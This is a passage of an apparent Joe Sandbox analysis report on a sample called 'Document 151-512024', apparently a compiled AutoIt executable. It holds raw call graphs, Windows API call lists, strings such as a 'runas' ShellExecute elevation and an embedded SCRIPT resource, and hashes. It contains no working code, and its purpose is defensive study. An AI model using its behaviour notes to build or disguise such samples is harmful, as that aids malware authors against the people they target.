82 API calls __wsopen_s 99086->99106 99087 94ec40 256 API calls 99087->99090 99088 94a8c7 22 API calls 99088->99090 99090->99072 99090->99075 99090->99077 99090->99079 99090->99086 99090->99087 99090->99088 99091 94a81b 41 API calls 99090->99091 99092 95d2f0 40 API calls 99090->99092 99093 95a01b 256 API calls 99090->99093 99094 960242 5 API calls __Init_thread_wait 99090->99094 99095 95edcd 22 API calls 99090->99095 99096 9600a3 29 API calls __onexit 99090->99096 99097 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99090->99097 99098 95ee53 82 API calls 99090->99098 99099 95e5ca 256 API calls 99090->99099 99103 94aceb 23 API calls ISource 99090->99103 99104 99f6bf 23 API calls 99090->99104 99091->99090 99092->99090 99093->99090 99094->99090 99095->99090 99096->99090 99097->99090 99098->99090 99099->99090 99100->99069 99101->99086 99102->99090 99103->99090 99104->99090 99105->99086 99106->99073 99107 978402 99112 9781be 99107->99112 99110 97842a 99113 9781ef try_get_first_available_module 99112->99113 99120 978338 99113->99120 99127 968e0b 40 API calls 2 library calls 99113->99127 99115 9783ee 99131 9727ec 26 API calls __fread_nolock 99115->99131 99117 978343 99117->99110 99124 980984 99117->99124 99119 97838c 99119->99120 99128 968e0b 40 API calls 2 library calls 99119->99128 99120->99117 99130 96f2d9 20 API calls __dosmaperr 99120->99130 99122 9783ab 99122->99120 99129 968e0b 40 API calls 2 library calls 99122->99129 99132 980081 99124->99132 99126 98099f 99126->99110 99127->99119 99128->99122 99129->99120 99130->99115 99131->99117 99135 98008d __FrameHandler3::FrameUnwindToState 99132->99135 99133 98009b 99190 96f2d9 20 API calls __dosmaperr 99133->99190 99135->99133 99136 9800d4 99135->99136 99143 98065b 99136->99143 99137 9800a0 99191 9727ec 26 API calls __fread_nolock 99137->99191 99142 9800aa __fread_nolock 99142->99126 99193 98042f 99143->99193 99146 98068d 99225 96f2c6 20 API calls __dosmaperr 99146->99225 99147 9806a6 99211 975221 99147->99211 99150 9806ab 99152 9806cb 99150->99152 99153 9806b4 99150->99153 99151 980692 99226 96f2d9 20 API calls __dosmaperr 99151->99226 99224 98039a CreateFileW 99152->99224 99227 96f2c6 20 API calls __dosmaperr 99153->99227 99157 9806b9 99228 96f2d9 20 API calls __dosmaperr 99157->99228 99159 980781 GetFileType 99160 98078c GetLastError 99159->99160 99161 9807d3 99159->99161 99231 96f2a3 20 API calls __dosmaperr 99160->99231 99233 97516a 21 API calls 2 library calls 99161->99233 99162 980756 GetLastError 99230 96f2a3 20 API calls __dosmaperr 99162->99230 99165 980704 99165->99159 99165->99162 99229 98039a CreateFileW 99165->99229 99166 98079a CloseHandle 99166->99151 99168 9807c3 99166->99168 99232 96f2d9 20 API calls __dosmaperr 99168->99232 99170 980749 99170->99159 99170->99162 99172 9807f4 99176 980840 99172->99176 99234 9805ab 72 API calls 3 library calls 99172->99234 99173 9807c8 99173->99151 99178 98086d 99176->99178 99235 98014d 72 API calls 4 library calls 99176->99235 99177 980866 99177->99178 99179 98087e 99177->99179 99180 9786ae __wsopen_s 29 API calls 99178->99180 99181 9800f8 99179->99181 99182 9808fc CloseHandle 99179->99182 99180->99181 99192 980121 LeaveCriticalSection __wsopen_s 99181->99192 99236 98039a CreateFileW 99182->99236 99184 980927 99185 980931 GetLastError 99184->99185 99186 98095d 99184->99186 99237 96f2a3 20 API calls __dosmaperr 99185->99237 99186->99181 99188 98093d 99238 975333 21 API calls 2 library calls 99188->99238 99190->99137 99191->99142 99192->99142 99194 98046a 99193->99194 99195 980450 99193->99195 99239 9803bf 99194->99239 99195->99194 99246 96f2d9 20 API calls __dosmaperr 99195->99246 99198 98045f 99247 9727ec 26 API calls __fread_nolock 99198->99247 99200 9804a2 99201 9804d1 99200->99201 99248 96f2d9 20 API calls __dosmaperr 99200->99248 99209 980524 99201->99209 99250 96d70d 26 API calls 2 library calls 99201->99250 99204 98051f 99207 98059e 99204->99207 99204->99209 99205 9804c6 99249 9727ec 26 API calls __fread_nolock 99205->99249 99251 9727fc 11 API calls _abort 99207->99251 99209->99146 99209->99147 99210 9805aa 99212 97522d __FrameHandler3::FrameUnwindToState 99211->99212 99254 972f5e EnterCriticalSection 99212->99254 99214 97527b 99255 97532a 99214->99255 99216 975259 99218 975000 __wsopen_s 21 API calls 99216->99218 99217 9752a4 __fread_nolock 99217->99150 99220 97525e 99218->99220 99219 975234 99219->99214 99219->99216 99221 9752c7 EnterCriticalSection 99219->99221 99220->99214 99258 975147 EnterCriticalSection 99220->99258 99221->99214 99223 9752d4 LeaveCriticalSection 99221->99223 99223->99219 99224->99165 99225->99151 99226->99181 99227->99157 99228->99151 99229->99170 99230->99151 99231->99166 99232->99173 99233->99172 99234->99176 99235->99177 99236->99184 99237->99188 99238->99186 99241 9803d7 99239->99241 99240 9803f2 99240->99200 99241->99240 99252 96f2d9 20 API calls __dosmaperr 99241->99252 99243 980416 99253 9727ec 26 API calls __fread_nolock 99243->99253 99245 980421 99245->99200 99246->99198 99247->99194 99248->99205 99249->99201 99250->99204 99251->99210 99252->99243 99253->99245 99254->99219 99259 972fa6 LeaveCriticalSection 99255->99259 99257 975331 99257->99217 99258->99214 99259->99257 99260 942de3 99261 942df0 __wsopen_s 99260->99261 99262 982c2b ___scrt_fastfail 99261->99262 99263 942e09 99261->99263 99265 982c47 GetOpenFileNameW 99262->99265 99264 943aa2 23 API calls 99263->99264 99266 942e12 99264->99266 99267 982c96 99265->99267 99276 942da5 99266->99276 99269 946b57 22 API calls 99267->99269 99271 982cab 99269->99271 99271->99271 99273 942e27 99294 9444a8 99273->99294 99277 981f50 __wsopen_s 99276->99277 99278 942db2 GetLongPathNameW 99277->99278 99279 946b57 22 API calls 99278->99279 99280 942dda 99279->99280 99281 943598 99280->99281 99282 94a961 22 API calls 99281->99282 99283 9435aa 99282->99283 99284 943aa2 23 API calls 99283->99284 99285 9435b5 99284->99285 99286 9832eb 99285->99286 99287 9435c0 99285->99287 99293 98330d 99286->99293 99329 95ce60 41 API calls 99286->99329 99289 94515f 22 API calls 99287->99289 99290 9435cc 99289->99290 99323 9435f3 99290->99323 99292 9435df 99292->99273 99295 944ecb 94 API calls 99294->99295 99296 9444cd 99295->99296 99297 983833 99296->99297 99299 944ecb 94 API calls 99296->99299 99298 9b2cf9 80 API calls 99297->99298 99300 983848 99298->99300 99301 9444e1 99299->99301 99302 983869 99300->99302 99303 98384c 99300->99303 99301->99297 99304 9444e9 99301->99304 99306 95fe0b 22 API calls 99302->99306 99305 944f39 68 API calls 99303->99305 99307 9444f5 99304->99307 99308 983854 99304->99308 99305->99308 99313 9838ae 99306->99313 99336 94940c 136 API calls 2 library calls 99307->99336 99337 9ada5a 82 API calls 99308->99337 99311 983862 99311->99302 99312 942e31 99315 983a5f 99313->99315 99316 94a4a1 22 API calls 99313->99316 99320 949cb3 22 API calls 99313->99320 99330 943ff7 99313->99330 99338 9a967e 22 API calls __fread_nolock 99313->99338 99339 9a95ad 42 API calls _wcslen 99313->99339 99340 9b0b5a 22 API calls 99313->99340 99314 944f39 68 API calls 99314->99315 99315->99314 99341 9a989b 82 API calls __wsopen_s 99315->99341 99316->99313 99320->99313 99324 943605 99323->99324 99328 943624 __fread_nolock 99323->99328 99326 95fe0b 22 API calls 99324->99326 99325 95fddb 22 API calls 99327 94363b 99325->99327 99326->99328 99327->99292 99328->99325 99329->99286 99331 94400a 99330->99331 99334 9440ae 99330->99334 99332 95fe0b 22 API calls 99331->99332 99335 94403c 99331->99335 99332->99335 99333 95fddb 22 API calls 99333->99335 99334->99313 99335->99333 99335->99334 99336->99312 99337->99311 99338->99313 99339->99313 99340->99313 99341->99315 99342 941cad SystemParametersInfoW 99343 992a00 99358 94d7b0 ISource 99343->99358 99344 94db11 PeekMessageW 99344->99358 99345 94d807 GetInputState 99345->99344 99345->99358 99346 991cbe TranslateAcceleratorW 99346->99358 99348 94db8f PeekMessageW 99348->99358 99349 94da04 timeGetTime 99349->99358 99350 94db73 TranslateMessage DispatchMessageW 99350->99348 99351 94dbaf Sleep 99368 94dbc0 99351->99368 99352 992b74 Sleep 99352->99368 99353 991dda timeGetTime 99407 95e300 23 API calls 99353->99407 99354 95e551 timeGetTime 99354->99368 99357 992c0b GetExitCodeProcess 99361 992c21 WaitForSingleObject 99357->99361 99362 992c37 CloseHandle 99357->99362 99358->99344 99358->99345 99358->99346 99358->99348 99358->99349 99358->99350 99358->99351 99358->99352 99358->99353 99364 94d9d5 99358->99364 99371 94ec40 256 API calls 99358->99371 99373 951310 256 API calls 99358->99373 99375 94dd50 99358->99375 99382 94dfd0 99358->99382 99405 94bf40 256 API calls 2 library calls 99358->99405 99406 95edf6 IsDialogMessageW GetClassLongW 99358->99406 99408 9b3a2a 23 API calls 99358->99408 99409 9b359c 82 API calls __wsopen_s 99358->99409 99359 9d29bf GetForegroundWindow 99359->99368 99361->99358 99361->99362 99362->99368 99363 992a31 99363->99364 99365 992ca9 Sleep 99365->99358 99368->99354 99368->99357 99368->99358 99368->99359 99368->99363 99368->99364 99368->99365 99410 9c5658 23 API calls 99368->99410 99411 9ae97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99368->99411 99412 9ad4dc 47 API calls 99368->99412 99371->99358 99373->99358 99376 94dd83 99375->99376 99377 94dd6f 99375->99377 99414 9b359c 82 API calls __wsopen_s 99376->99414 99413 94d260 256 API calls 2 library calls 99377->99413 99379 94dd7a 99379->99358 99381 992f75 99381->99381 99383 94e010 99382->99383 99402 94e0dc ISource 99383->99402 99417 960242 5 API calls __Init_thread_wait 99383->99417 99386 9b359c 82 API calls 99386->99402 99387 992fca 99389 94a961 22 API calls 99387->99389 99387->99402 99388 94a961 22 API calls 99388->99402 99392 992fe4 99389->99392 99418 9600a3 29 API calls __onexit 99392->99418 99395 992fee 99419 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99395->99419 99396 94ec40 256 API calls 99396->99402 99399 94a8c7 22 API calls 99399->99402 99400 9504f0 22 API calls 99400->99402 99401 94e3e1 99401->99358 99402->99386 99402->99388 99402->99396 99402->99399 99402->99400 99402->99401 99415 94a81b 41 API calls 99402->99415 99416 95a308 256 API calls 99402->99416 99420 960242 5 API calls __Init_thread_wait 99402->99420 99421 9600a3 29 API calls __onexit 99402->99421 99422 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99402->99422 99423 9c47d4 256 API calls 99402->99423 99424 9c68c1 256 API calls 99402->99424 99405->99358 99406->99358 99407->99358 99408->99358 99409->99358 99410->99368 99411->99368 99412->99368 99413->99379 99414->99381 99415->99402 99416->99402 99417->99387 99418->99395 99419->99402 99420->99402 99421->99402 99422->99402 99423->99402 99424->99402 99425 982ba5 99426 942b25 99425->99426 99427 982baf 99425->99427 99453 942b83 7 API calls 99426->99453 99428 943a5a 24 API calls 99427->99428 99430 982bb8 99428->99430 99433 949cb3 22 API calls 99430->99433 99435 982bc6 99433->99435 99434 942b2f 99441 942b44 99434->99441 99457 943837 49 API calls ___scrt_fastfail 99434->99457 99436 982bce 99435->99436 99437 982bf5 99435->99437 99439 9433c6 22 API calls 99436->99439 99440 9433c6 22 API calls 99437->99440 99442 982bd9 99439->99442 99443 982bf1 GetForegroundWindow ShellExecuteW 99440->99443 99444 942b5f 99441->99444 99458 9430f2 Shell_NotifyIconW ___scrt_fastfail 99441->99458 99445 946350 22 API calls 99442->99445 99449 982c26 99443->99449 99451 942b66 SetCurrentDirectoryW 99444->99451 99448 982be7 99445->99448 99450 9433c6 22 API calls 99448->99450 99449->99444 99450->99443 99452 942b7a 99451->99452 99459 942cd4 7 API calls 99453->99459 99455 942b2a 99456 942c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99455->99456 99456->99434 99457->99441 99458->99444 99459->99455

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 234 9442de-94434d call 94a961 GetVersionExW call 946b57 239 944353 234->239 240 983617-98362a 234->240 241 944355-944357 239->241 242 98362b-98362f 240->242 243 94435d-9443bc call 9493b2 call 9437a0 241->243 244 983656 241->244 245 983631 242->245 246 983632-98363e 242->246 262 9443c2-9443c4 243->262 263 9837df-9837e6 243->263 249 98365d-983660 244->249 245->246 246->242 248 983640-983642 246->248 248->241 251 983648-98364f 248->251 252 983666-9836a8 249->252 253 94441b-944435 GetCurrentProcess IsWow64Process 249->253 251->240 255 983651 251->255 252->253 256 9836ae-9836b1 252->256 258 944494-94449a 253->258 259 944437 253->259 255->244 260 9836db-9836e5 256->260 261 9836b3-9836bd 256->261 264 94443d-944449 258->264 259->264 270 9836f8-983702 260->270 271 9836e7-9836f3 260->271 267 9836ca-9836d6 261->267 268 9836bf-9836c5 261->268 262->249 269 9443ca-9443dd 262->269 272 9837e8 263->272 273 983806-983809 263->273 265 94444f-94445e LoadLibraryA 264->265 266 983824-983828 GetSystemInfo 264->266 274 944460-94446e GetProcAddress 265->274 275 94449c-9444a6 GetSystemInfo 265->275 267->253 268->253 276 9443e3-9443e5 269->276 277 983726-98372f 269->277 279 983704-983710 270->279 280 983715-983721 270->280 271->253 278 9837ee 272->278 281 98380b-98381a 273->281 282 9837f4-9837fc 273->282 274->275 283 944470-944474 GetNativeSystemInfo 274->283 284 944476-944478 275->284 285 98374d-983762 276->285 286 9443eb-9443ee 276->286 287 98373c-983748 277->287 288 983731-983737 277->288 278->282 279->253 280->253 281->278 289 98381c-983822 281->289 282->273 283->284 292 944481-944493 284->292 293 94447a-94447b FreeLibrary 284->293 290 98376f-98377b 285->290 291 983764-98376a 285->291 294 9443f4-94440f 286->294 295 983791-983794 286->295 287->253 288->253 289->282 290->253 291->253 293->292 297 944415 294->297 298 983780-98378c 294->298 295->253 296 98379a-9837c1 295->296 299 9837ce-9837da 296->299 300 9837c3-9837c9 296->300 297->253 298->253 299->253 300->253
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0094430D
                                                                                                      • Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A
                                                                                                    • GetCurrentProcess.KERNEL32(?,009DCB64,00000000,?,?), ref: 00944422
                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00944429
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00944454
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00944466
                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00944474
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0094447B
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 009444A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                    • Opcode ID: 95832f5e2d9cd7e826c5c30200db69e4cdee977692ec10dd468a7bfb93fd4a1c
                                                                                                    • Instruction ID: e8177f93315ff11420dacce80c1e2499952592343a447933ebe027ed89c6c119
                                                                                                    • Opcode Fuzzy Hash: 95832f5e2d9cd7e826c5c30200db69e4cdee977692ec10dd468a7bfb93fd4a1c
                                                                                                    • Instruction Fuzzy Hash: 8BA1D86190E2D0CFCB51DBF97C857D97FE86B26780B08C89AD2619BB39D2248507DB21

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 661 9442a2-9442ba CreateStreamOnHGlobal 662 9442bc-9442d3 FindResourceExW 661->662 663 9442da-9442dd 661->663 664 9835ba-9835c9 LoadResource 662->664 665 9442d9 662->665 664->665 666 9835cf-9835dd SizeofResource 664->666 665->663 666->665 667 9835e3-9835ee LockResource 666->667 667->665 668 9835f4-983612 667->668 668->665
                                                                                                    APIs
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009450AA,?,?,00000000,00000000), ref: 009442B2
                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009450AA,?,?,00000000,00000000), ref: 009442C9
                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,009450AA,?,?,00000000,00000000,?,?,?,?,?,?,00944F20), ref: 009835BE
                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,009450AA,?,?,00000000,00000000,?,?,?,?,?,?,00944F20), ref: 009835D3
                                                                                                    • LockResource.KERNEL32(009450AA,?,?,009450AA,?,?,00000000,00000000,?,?,?,?,?,?,00944F20,?), ref: 009835E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                    • String ID: SCRIPT
                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                    • Opcode ID: 173d2911d7f98de0aeb93514638123704b61c260740ad91f01f71834fc9346d6
                                                                                                    • Instruction ID: 309d6fcbabaf96fcebc0d2d8f7cdc19e6cd7e0099b1afa68d28567b2c0046221
                                                                                                    • Opcode Fuzzy Hash: 173d2911d7f98de0aeb93514638123704b61c260740ad91f01f71834fc9346d6
                                                                                                    • Instruction Fuzzy Hash: 51117CB0251701BFDB218BA5DC48F277BBDEBC5B51F10816EB52296290DBB1D840D620

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00942B6B
                                                                                                      • Part of subcall function 00943A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A11418,?,00942E7F,?,?,?,00000000), ref: 00943A78
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00A02224), ref: 00982C10
                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,00A02224), ref: 00982C17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                    • String ID: runas
                                                                                                    • API String ID: 448630720-4000483414
                                                                                                    • Opcode ID: 4d36a3e419d841a76a483e3785a8c0fd4516c713092b0a8d5e59cddf6bfe72b9
                                                                                                    • Instruction ID: 733e1746c34547cdd5c86483a6a82bbc0c634d8be7a9f0178043239dc39e88bd
                                                                                                    • Opcode Fuzzy Hash: 4d36a3e419d841a76a483e3785a8c0fd4516c713092b0a8d5e59cddf6bfe72b9
                                                                                                    • Instruction Fuzzy Hash: F01106716483056AC704FF70D855FAEB7A8AFD2740F84482DF182021A2CF30894AC712
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,00985222), ref: 009ADBCE
                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 009ADBDD
                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 009ADBEE
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009ADBFA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2695905019-0
                                                                                                    • Opcode ID: 1cb3314b33f64a649ce95b44fde6f4aada879d57a94af8271179ecbae5d752fa
                                                                                                    • Instruction ID: 130e9d33e3dad1ea29848e71ade6586acece704b7da06eb39129ae9e9ebb61bf
                                                                                                    • Opcode Fuzzy Hash: 1cb3314b33f64a649ce95b44fde6f4aada879d57a94af8271179ecbae5d752fa
                                                                                                    • Instruction Fuzzy Hash: 55F0E57086A9215782206B7CED0D8AA377C9E03334B904713F9B7C24F0EBB49D94E6D5
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 0094D807
                                                                                                    • timeGetTime.WINMM ref: 0094DA07
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0094DB28
                                                                                                    • TranslateMessage.USER32(?), ref: 0094DB7B
                                                                                                    • DispatchMessageW.USER32(?), ref: 0094DB89
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0094DB9F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0094DBB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189390790-0
                                                                                                    • Opcode ID: e414c6d9b2e2af2c90cec21e892d3367a1ce34742cb7728dba03a243eba8e341
                                                                                                    • Instruction ID: 85eadc54cb8488ad7c4859fbfa30d15c01a78189a231221706113197411aaf44
                                                                                                    • Opcode Fuzzy Hash: e414c6d9b2e2af2c90cec21e892d3367a1ce34742cb7728dba03a243eba8e341
                                                                                                    • Instruction Fuzzy Hash: CB42E37460A342EFDB28CF28C894FAAB7E8FF85314F14895DE49587291D774E844CB92

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00942D07
                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00942D31
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00942D42
                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00942D5F
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00942D6F
                                                                                                    • LoadIconW.USER32(000000A9), ref: 00942D85
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00942D94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                    • Opcode ID: 272209145b4ec24910355e078a0abdc7a572960c233fc6edcb20aac9a48982dc
                                                                                                    • Instruction ID: 52ee6e8f5b56a3a7a444eea0151786d15e62267a67786fec85b8a9466b71223d
                                                                                                    • Opcode Fuzzy Hash: 272209145b4ec24910355e078a0abdc7a572960c233fc6edcb20aac9a48982dc
                                                                                                    • Instruction Fuzzy Hash: 2821E3B5952309AFDB00DFE4E849BDDBBB8FB08704F00811AF621A62A0D7B10585DF90

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 302 98065b-98068b call 98042f 305 98068d-980698 call 96f2c6 302->305 306 9806a6-9806b2 call 975221 302->306 313 98069a-9806a1 call 96f2d9 305->313 311 9806cb-980714 call 98039a 306->311 312 9806b4-9806c9 call 96f2c6 call 96f2d9 306->312 321 980781-98078a GetFileType 311->321 322 980716-98071f 311->322 312->313 323 98097d-980983 313->323 324 98078c-9807bd GetLastError call 96f2a3 CloseHandle 321->324 325 9807d3-9807d6 321->325 327 980721-980725 322->327 328 980756-98077c GetLastError call 96f2a3 322->328 324->313 339 9807c3-9807ce call 96f2d9 324->339 331 9807d8-9807dd 325->331 332 9807df-9807e5 325->332 327->328 333 980727-980754 call 98039a 327->333 328->313 336 9807e9-980837 call 97516a 331->336 332->336 337 9807e7 332->337 333->321 333->328 344 980839-980845 call 9805ab 336->344 345 980847-98086b call 98014d 336->345 337->336 339->313 344->345 351 98086f-980879 call 9786ae 344->351 352 98086d 345->352 353 98087e-9808c1 345->353 351->323 352->351 355 9808e2-9808f0 353->355 356 9808c3-9808c7 353->356 359 98097b 355->359 360 9808f6-9808fa 355->360 356->355 358 9808c9-9808dd 356->358 358->355 359->323 360->359 361 9808fc-98092f CloseHandle call 98039a 360->361 364 980931-98095d GetLastError call 96f2a3 call 975333 361->364 365 980963-980977 361->365 364->365 365->359
                                                                                                    APIs
                                                                                                      • Part of subcall function 0098039A: CreateFileW.KERNELBASE(00000000,00000000,?,00980704,?,?,00000000,?,00980704,00000000,0000000C), ref: 009803B7
                                                                                                    • GetLastError.KERNEL32 ref: 0098076F
                                                                                                    • __dosmaperr.LIBCMT ref: 00980776
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00980782
                                                                                                    • GetLastError.KERNEL32 ref: 0098078C
                                                                                                    • __dosmaperr.LIBCMT ref: 00980795
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009807B5
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009808FF
                                                                                                    • GetLastError.KERNEL32 ref: 00980931
                                                                                                    • __dosmaperr.LIBCMT ref: 00980938
                                                                                                    Strings
                                                                                                    Memory Dump Source
